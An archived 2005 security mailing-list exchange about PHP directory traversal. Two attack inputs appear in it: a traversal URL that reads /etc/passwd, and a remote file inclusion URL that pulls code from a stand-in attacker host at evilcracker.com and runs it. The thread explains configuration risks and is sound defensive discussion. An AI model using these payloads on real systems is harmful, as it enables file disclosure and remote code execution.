|
WebApp Sec
mailing list archives
Re: PHP Directory Transversal
From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Mon, 14 Mar 2005 17:02:38 +0000
It seems that the problem was that it had "safe_mode" on....
Thank you all for the replies!
Cheers, Andy
From: John GALLET <john.gallet () wanadoo fr>
To: Andres Molinetti <andymolinetti () hotmail com>
CC: pen-test () securityfocus com, <webappsec () securityfocus com>
Subject: Re: PHP Directory Transversal
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)
Hi there,
> Therefore, I tried doing a
> www.example.com/static.php?page=../../../../../../etc/passwd
> but I get an error saying that file doesn't exist.
> I user the same source code in my server, and I could retrieve the
> file...what can be happening? I don't think it is under a chroot jail...
What you can or can not read depends on the configuration of php
(include_path vs safe mode for example). Have a look at :
http://fr3.php.net/features.safe-mode
Now the real risk is not so much reading some source code as executing
some other people's code.
www.example.com/static.php?page=http://evilcracker.com/evil_code.txt
has good chances of also getting executed, which opens the path to
install any backdoor, download perl scripts/trojans, etc...
HTH
JG
_________________________________________________________________
Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor
& Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349
 By Date 
By Thread
Current thread:
- Re: PHP Directory Transversal, (continued)
|
Intro
